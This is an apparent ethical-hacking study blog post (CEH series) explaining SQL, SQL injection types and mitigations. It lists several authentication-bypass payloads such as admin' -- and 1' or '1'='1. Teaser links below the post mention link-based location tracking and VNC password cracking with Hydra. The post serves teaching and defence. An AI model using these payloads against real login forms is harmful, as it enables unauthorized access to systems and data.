CEH 15- SQL Injection

By

What is a Database? 

  • A database is a collection of information that is organized into rows, columns and tables. 
  • It is indexed so that it can be easily accessed, managed and updated. 
  • Data in the database gets updated, expanded and deleted as new information is added.
  • Database software examples:
  1. MySQL
  2. Oracle
  3. Microsoft SQL
  4. SQL lite
  5. MongoDB
  6. Microsoft Access
  7. Postgresql
Disclaimer: The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Ethical Hacking, Security and Penetration Testing. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking.

What is SQL? 

  • SQL stands for Structured Query Language.
  • SQL is a database management language used to manage databases, to perform various operations like create, read, update and delete data on the database. 
  • SQL is used by database administrators, as well as developers to organize user data properly. 
  • Web Applications interact with the database server in the form of queries. 
  • SQL queries include select, add, insert, update, delete, create, alter and truncates the data in database.

How Web server and Database server communicates? 

  • A server is a software that runs continuously and responds to requests sent by the clients. 
  • Communication between a client and a server happens using a specific protocol example HTTP, HTTPS Server running web application include three components like:
  1. Web Server 
  2. Application Server 
  3. Database Server 

1. Web Servers:

  • It primarily respond to HTTP / HTTPS requests sent by the clients and passes these requests on to handlers. 

2. Application Server: 

  • It handles requests to create dynamic web pages. 
  • The application server processes the user request and generates the HTML page for the end user, instead of serving a static HTML page stored on the disk. 
  • Application server software runs on the same physical server machine. 

3. Database Server: 

  • It is a server which houses a database application like JDBC, ODBC to provide database services to other computer programs. 
  • Most database applications respond to a query language. 
  • Each database understands its own query language and converts each submitted query to server-readable form and executes it to retrieve results.
 

We have discussed all basic information about database and SQL. Now Let's move to SQL Injection attack. 

What is SQL Injection? 

  • SQL Injection(SQLi) is a technique used to take advantage of non-validated input vulnerabilities.
  • With this vulnerabilities we can pass SQL commands through a web application for execution on backend database.
  • It retrieves information directly from the database. 
  • It is used to gain unauthorized access to the database. 
  • SQL Injection is not a vulnerability in database or web server. 
  • It is a vulnerability in a web application which occurs due to lack of input validation.
  • Types of SQL Injection attacks: 
  1. Authentication bypass attack 
  2. Error-based SQL Injection 
  3. Blind SQL Injection

1. Authentication Bypass Attack: 

  • The attacker uses this technique to bypass user authentication without providing the valid Username and password. 
  • Then attacker tries to log into a web application with administrative privileges.
  • Example: Try to inject below code into login username and password of Web Application. 
  • 1’ or ‘1’ = ‘1
  • admin' --
  • admin' or '1'='1
  • admin' or 1=1 or ''='
  • admin') or ('1'='1'#

2. Error-Based SQL Injection: 

  • Error-based SQL injection technique relies on error messages thrown by the database server.
  • From these errors we obtain information about the structure of the database. 
  • In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. 
  • While errors are very useful during the development phase of a web application, they should be disabled on a live site or logged to a file with restricted access. 
  • By analyzing these errors, the attacker can grab system information such as the database, database version, OS, data in database, etc.

3. Blind SQL Injection: 

  • Blind SQL injection is a type of SQL Injection attack that queries the database true or false questions and determines the answer based on the applications response. 
  • This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection. 
  • Blind SQL injection is nearly identical to normal SQL Injection. 
  • The only difference being the way the data is retrieved from the database.

Mitigations:

  • Sanitize and validate all user input fields. 
  • Use parameterized statements, separate data from SQL code. 
  • Reject entries that contain binary data, escape sequences and comment characters.
  • Checking the privileges of a user’s connection to the database. 
  • Use secure hash algorithms to secure user passwords stored in the database. 
  • Perform source code review before hosting website. 

Be Aware, Be Secure.

Thank You 🙏

I'm a Cyber Security professional with expertise in Network, Application, Endpoint, Cloud Security, DevOps, and IT Ops. I have experience in various industries and am well-versed in relevant regulations and standards. My goal is to provide exceptional security solutions that protect organizations from evolving threats, while also streamlining workflows and improving collaboration between development, operations, and security teams through DevOps and IT Ops practices.

Comments

Post a Comment

Popular posts from this blog

Demo 1- How to Track Location by a Link

By
Image
↑ GPS: GPS stands for Global Positioning System . The Global Positioning System, originally NAVSTAR GPS, is a satellite-based radionavigation system owned by the United States government and operated by the United States Air Force. It is a global navigation satellite system (GNSS) that provides geolocation and time information to a GPS receiver anywhere on or near the Earth where there is an unobstructed line of sight to four or more GPS satellites. Obstacles such as mountains and buildings block the relatively weak GPS signals. Locator v1.0: Locator is a tool developed by "thelinuxchoice".This tool is implemented in Shell Scripting. This tool is implemented in Shell Scripting. Geolocator, Ip Tracker, Device Info by URL (Serveo and Ngrok). It uses tinyurl to obfuscate the Serveo link. Disclaimer:  Usage of Locator for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable lo
Read more

Snyk - Ubuntu 20.04 (Linux)

By
Image
In this article, we are going to learn about Snyk, features, and hands-on demo on how to install, usage and uninstall on Ubuntu 20.04(Linux).   Disclaimer:   The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Cyber Security, Ethical Hacking,  Software Development and  IT Operations. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking. Table of Content What is Snyk ?   Jump to Features   Jump to Hands-On   Jump to Requirements   Jump to Download   Jump to Install   Jump to Usage   Jump to Uninstall    Jump to Cheat Sheet    Jump to    What is Snyk ?  Snyk is a developer security platform for securing code , dependencies , containers , and infrastructure as code .  Integra
Read more

Cracking VNC Password Using Hydra

By
Image
Today we are going learn how to crack the password of VNC service using Hydra Tool.  Disclaimer: The articles provided on HackWithV is purely for informational and educational purpose only, and for those who are willing and curious to know & learn about Ethical Hacking, Security and Penetration Testing. Anytime the word "Hacking" that is used on this site shall be regarded as Ethical Hacking. What is VNC? Virtual Network Computing ( VNC ) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol ( RFB ) to remotely control another computer.  What is Hydra? Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, i
Read more